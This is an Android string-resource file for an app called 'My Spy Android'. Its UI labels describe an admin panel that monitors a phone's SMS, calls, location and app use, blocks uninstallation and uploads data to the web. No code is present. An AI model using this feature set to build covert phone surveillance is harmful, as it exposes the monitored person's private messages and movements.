<resources>
    <string name="app_name">My Spy Android</string>
    <string name="app_name_short">My Spy</string>
    <string name="AdminLogin">Admin Login</string>
    <string name="Welcome">Welcome to</string>
    <string name="SelectDay">Select a day:</string>
    <string name="Login">Login</string>
    <string name="Password">Password</string>
    <string name="StartText">Thanks for using My Spy for Android. But remains one more little step to safety...</string>
    <string name="PasswordSettings">Please set your administrator password</string>
    <string name="RepeatPassword">Repeat password</string>
    <string name="NotEquals">Passwords not equals</string>
    <string name="EmptyPassword">Password box is empty</string>
    <string name="BadPassword">Wrong password</string>
    <string name="Administator">My Spy Administrator panel</string>
    <string name="title_activity_administrator">My Spy administrator</string>
    <string name="action_LogOut">Log out</string>
    <string name="Tab1">Statistics</string>
    <string name="Tab2">Reports</string>
    <string name="Tab3">Settings</string>
    <string name="SMSReports">SMS Reports</string>
    <string name="Error">Something is bad. Try again.</string>
    <string name="SMSSended">SMS sent</string>
    <string name="title_activity_skuska">SKuska</string>
    <string name="action_settings">Settings</string>
    <string name="SMSReceived">SMS received</string>
    <string name="SMSStatistics">SMS statistics</string>
    <string name="SMSMessaging">SMS messaging</string>
    <string name="OverallSMS">Overall SMS</string>
    <string name="Number">Number</string>
    <string name="SMS_Info_Number">SMS - Number:</string>
    <string name="readsms">Read SMS</string>
    <string name="SMSList">SMS List</string>
    <string name="All">ALL</string>
    <string name="Sent">Sent</string>
    <string name="SentAverage">Sent week average</string>
    <string name="Received">Received</string>
    <string name="ReceivedAverage">Received week average</string>
    <string name="SMSReadLegendSent">Sent messages</string>
    <string name="SMSReadLegendRec">Received messages</string>
    <string name="CallReports">Phone calls reports</string>
    <string name="CallsCountStatistics">Calls count</string>
    <string name="CallMade">Made calls</string>
    <string name="CallReceived">Received calls</string>
    <string name="CallMissed">Missed calls</string>
    <string name="Time">Time</string>
    <string name="Length">Length</string>
    <string name="MadeLength">Made calls length</string>
    <string name="MadeWeekLength">Made calls length of week</string>
    <string name="ReceivedLength">Received calls length</string>
    <string name="ReceivedWeekLength">Received calls length of week</string>
    <string name="CallsLength">Length of all calls</string>
    <string name="OK">OK</string>
    <string name="ChangePassword">Change password</string>
    <string name="MonitorSMS">Monitor SMS</string>
    <string name="MonitorCall">Monitor calls</string>
    <string name="Save">Save</string>
    <string name="LocationReport">Location reports</string>
    <string name="LocationMonitoring">Location monitoring</string>
    <string name="MonitorLocation">Monitor location</string>
    <string name="AccuracyMonitoring">Accuracy of monitoring</string>
    <string name="Low">Low</string>
    <string name="Medium">Medium</string>
    <string name="High">High</string>
    <string name="RemoveReports">Remove reports</string>
    <string name="Removereport">Remove report?</string>
    <string name="Removereporttext">Are you sure you want to delete report from</string>
    <string name="Removed">Removed</string>
    <string name="FailedRemoveReport">Failed remove report</string>
    <string name="LocationName">Location name (City)</string>
    <string name="GetLocation">Get location automatically</string>
    <string name="GetByName">Get by name</string>
    <string name="WeatherSettings">Weather settings</string>
    <string name="ShowWeatherInfo">Show weather informations</string>
    <string name="Celsius">Celsius</string>
    <string name="Fahrenheit">Fahrenheit</string>
    <string name="WeatherUnit">Weather unit:</string>
    <string name="OldPassword">Old password</string>
    <string name="NewPassword">New password</string>
    <string name="NewPasswordRepeat">New password repeat</string>
    <string name="PasswordChanged">Password changed</string>
    <string name="METCredits">Data from MET Norway</string>
    <string name="MonitorApps">Monitor applications</string>
    <string name="BlockSettings">Block settings and uninstallation</string>
    <string name="BlockApplications">Block applications</string>
    <string name="BlockedApp">Blocked applications</string>
    <string name="AllApplication">All applications</string>
    <string name="ApplicationsReport">Applications reports</string>
    <string name="ApplicationName">Application name</string>
    <string name="RunningTime">Running Time</string>
    <string name="LastTimeRunning">Last time running</string>
    <string name="AliasHint">Alias for this mobile</string>
    <string name="DataToWeb">Upload data to web</string>
    <string name="WebSettings">Web settings</string>
    <string name="Email">Email address</string>
    <string name="EmptyForm">The form contains an empty box</string>
    <string name="Success">Success</string>
    <string name="NoSuccess">Error</string>
    <string name="Loggedin">Logged in</string>
</resources>
